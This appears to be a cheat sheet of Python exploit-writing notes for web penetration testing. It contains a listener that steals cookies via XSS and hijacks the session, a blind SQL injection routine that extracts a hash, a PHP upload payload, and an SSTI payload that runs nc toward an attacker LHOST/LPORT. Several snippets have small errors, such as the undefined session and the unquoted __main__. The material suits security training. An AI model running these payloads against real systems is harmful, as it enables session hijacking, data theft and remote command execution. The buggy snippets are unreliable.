Exploit Writing
Table of Contents
Code Snippets
Starting Template
import requests
def main():
print("Hello World!")
if __name__ == __main__:
main()
Useful imports
# For sending HTTP requests
import requests
# For Base64 encoding/decoding
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode
# For getting current time or for calculating time delays
from time import time
# For regular expressions
import re
# For running shell commands
import subprocess
# For multithreading
from concurrent.futures import ThreadPoolExecutor
# For running a HTTP server in the background
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
# For parsing HTTP cookies
from http import cookies
# For getting command-line arguments
import sys
Using the requests
library
requests
librarySending the simplest HTTP request
resp_obj = requests.get("https://github.com")
Specifying different HTTP methods
# GET method
requests.get("https://github.com")
# POST method
requests.post("https://github.com")
# PUT method
requests.put("https://github.com")
# PATCH method
requests.patch("https://github.com")
# DELETE method
requests.delete("https://github.com")
Reading the HTTP response
resp_obj = requests.get("https://github.com")
# HTTP status code (e.g 404, 500, 301)
resp_obj.status_code
# HTTP response headers (e.g Location, Content-Disposition)
resp_obj.headers["Location"]
# Body as bytes
resp_obj.content
# Body as a string
resp_obj.text
# Body as a dictionary (if body is a JSON)
resp_obj.json()
Sending data as a query string in the URL (Using params
argument)
params = {
"foo": "bar"
}
requests.get("https://github.com", params=params)
Sending data as a query string in the body (Using data
argument)
data = {
"foo": "bar"
}
requests.post("https://github.com", data=data)
Sending data as a JSON in the body (Using json
argument)
data = {
"foo": "bar"
}
requests.post("https://github.com", json=data)
Sending a file in the body (Using files
argument)
files = {
# (FILE_NAME, FILE_CONTENTS, FILE_MIMETYPE)
"uploaded_file": ("phpinfo.php", b"<?php phpinfo() ?>", "application/x-httpd-php")
}
requests.post("https://github.com", files=files)
Setting HTTP headers (Using headers
argument)
headers = {
"X-Forwarded-For": "127.0.0.1"
}
requests.get("https://github.com", headers=headers)
Setting HTTP cookies (Using cookies
argument)
cookies = {
"PHPSESSID": "fakesession"
}
requests.get("https://github.com", cookies=cookies)
Disabling following of 3XX
redirects (Using allow_redirects
argument)
requests.post("https://github.com/login", allow_redirects=False)
Interacting with an unverified HTTPS server (Using verify
argument)
# Supresses InsecureRequestWarning messages
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.get("https://github.com", verify=False)
Sending request through a HTTP proxy (Using proxies
argument)
proxies = {
"HTTP": "http://127.0.0.1:8080",
"HTTPS": "http://127.0.0.1:8080"
}
requests.get("https://github.com", proxies=proxies)
Creating a Session
session = requests.Session()
session.get("https://github.com")
Setting persistent cookies
session = requests.Session()
session.cookies.update({"PHPSESSID": "fakesession"})
Setting persistent headers
session = requests.Session()
session.headers["Authorization"] = "Basic 123"
Troubleshooting
Use Wireshark and filter for HTTP requests
Open Wireshark
Select the VPN interface (e.g
tun0
)Enter
http
into the filter bar.
Print contents of the HTTP request
data = {
"foo": "bar"
}
resp_obj = requests.post("https://github.com", data=data)
prepared_request = resp_obj.request
print("Method:\n", prepared_request.method)
print()
print("URL:\n", prepared_request.url)
print()
print("Headers:\n", prepared_request.headers)
print()
print("Body:\n", prepared_request.body)
Proxy HTTP request through Burp Suite and inspect
Open Burp Suite
Navigate to "Proxy" Tab and set "Intercept" to "On".
Reusable code
Serving files via HTTP
LHOST = "10.0.0.1"
WEB_PORT = 8000
JS_PAYLOAD = "<script>alert(1)</script>"
def start_web_server():
class MyHandler(BaseHTTPRequestHandler):
# Uncomment this method to suppress HTTP logs
# def log_message(self, format, *args):
# return
def do_GET(self):
if self.path.endswith('/payload.js'):
self.send_response(200)
self.send_header("Content-Type", "application/javascript")
self.send_header("Content-Length", str(len(JS_PAYLOAD)))
self.end_headers()
self.wfile.write(JS_PAYLOAD.encode())
httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
threading.Thread(target=httpd.serve_forever).start()
start_web_server()
Stealing HTTP cookies
LHOST = "10.0.0.1"
WEB_PORT = 8000
requests = requests.Session()
xss_event = threading.Event() # Signifies when victim sends their cookie
def send_xss_payload():
pass
def start_web_server():
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
# Load stolen cookie into session
_, enc_cookie = self.path.split("/?cookie=", 1)
plain_cookie = urlsafe_b64decode(enc_cookie).decode()
session.cookies["PHPSESSID"] = cookies.SimpleCookie(plain_cookie)["PHPSESSID"]
xss_event.set() # Trigger the event
httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
threading.Thread(target=httpd.serve_forever).start()
start_web_server()
send_xss_payload()
xss_event.wait() # Wait for event to be triggered
print("[+] Stolen cookie:", session.cookies["PHPSESSID"])
Speeding up SQL injections
MAX_WORKERS = 20
HASH_LENGTH = 32
def exfiltrate_hash():
def boolean_sqli(arguments):
idx, ascii_val = arguments
# ...
# Perform SQLi and store boolean outcome into truth
# ...
return ascii_val, truth
result = ""
# Go through each character position
for idx in range(HASH_LENGTH):
# Use MAX_WORKERS threads to test possible ASCII values in parallel
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
# Pass each of (0, 32), (0, 33) ..., (0, 126) as an argument to boolean_sqli()
responses = executor.map(boolean_sqli, [(idx, ascii_val) for ascii_val in range(32, 126)])
# Go through each response and determine which ASCII value is correct
for ascii_val, truth in responses:
if truth:
result += chr(ascii_val)
break
return result
hash = exfiltrate_hash()
Tips
Perform a sanity check after every HTTP request using assert
assert
Catch whether a webshell is indeed uploaded before attempting to trigger it
Catch whether authentication is sucessful before exploiting authenticated features
Example:
# Suppose 302 is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data, allow_redirect=False)
assert resp_obj.status_code == 302, "Login not successful"
# Suppose admin page is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data)
assert "Admin Dashboard" in resp_obj.content, "Login not successful"
Print meaning messages after each step
Action being started/finished OR
Cookies/tokens/files/values that were retrieved
Example:
[+] Parsed command-line arguments and got:
* BASE_URL: http://example.com
* LHOST: 127.0.0.1
* LPORT: 1337
[+] Triggered password reset token generation
[=] Getting password reset token length...
[+] Got password reset token length: 10
[=] Retrieving password reset token...
[+] Got password reset token: FAKE_TOKEN
Separate each exploitation step into its own function
Example:
def register():
pass
def login():
pass
def rce():
pass
Create a global Session
object so it does not need to be explictly passed to each function call
Session
object so it does not need to be explictly passed to each function callsession = requests.Session()
def login():
session.post(...)
def rce():
session.post(...)
Create a global BASE_URL
string and construct the required URLs from it
BASE_URL
string and construct the required URLs from itBASE_URL = ""
session = requests.Session()
def login():
url = BASE_URL + "/login"
session.post(url, ...)
def rce():
url = BASE_URL + "/rce"
session.post(url, ...)
def main():
# Allow BASE_URL to be modified
global BASE_URL
BASE_URL = sys.argv[1]
...
To force all HTTP requests to go through Burp Suite without the use of the proxies
argument , set the HTTP_PROXY
/ HTTPS_PROXY
environment variable when running
proxies
argument , set the HTTP_PROXY
/ HTTPS_PROXY
environment variable when running$ HTTP_PROXY=http://127.0.0.1:8080 python3 poc.py
Apply encoding/decoding scheme(s) to enable safe transmission of payloads
Base64
Hexadecimal
Use """
to create the payload string if it contains both single ('
) and double quotes ("
)
"""
to create the payload string if it contains both single ('
) and double quotes ("
)Example:
payload = """This is a '. This is a "."""
Speed up SQL injections using multithreading
Hardcode an authenticated user's cookie when developing exploits for authenticated features
Especially if a lot of time-consuming steps had to be done to obtain an authenticated session
Example:
session = requests.Session()
def main():
# Skipping these for now...
# register()
# login()
# TODO: Delete this line after you are
# done developing and uncomment the above steps!
session.cookies["JSESSIONID"] = "ADMIN_COOKIE"
# Exploit authenticated features...
...
Avoid using f-strings (f""
) or str.format
if the payload contains too many curly braces ({}
)
f""
) or str.format
if the payload contains too many curly braces ({}
)Doubling each curly brace just to escape them can be troublesome and error-prone. Instead use simple placeholders and do a .replace()
!
Example:
# Too many curly braces
ssti_payload = f"{{{{ __import__('os').system('nc {LHOST} {LPORT}') }}}}"
# Much easier to read
ssti_payload = "{{ __import__('os').system('nc <LHOST> <LPORT>') }}"\
.replace("<LHOST>", LHOST)\
.replace("<LPORT>", LPORT)
Last updated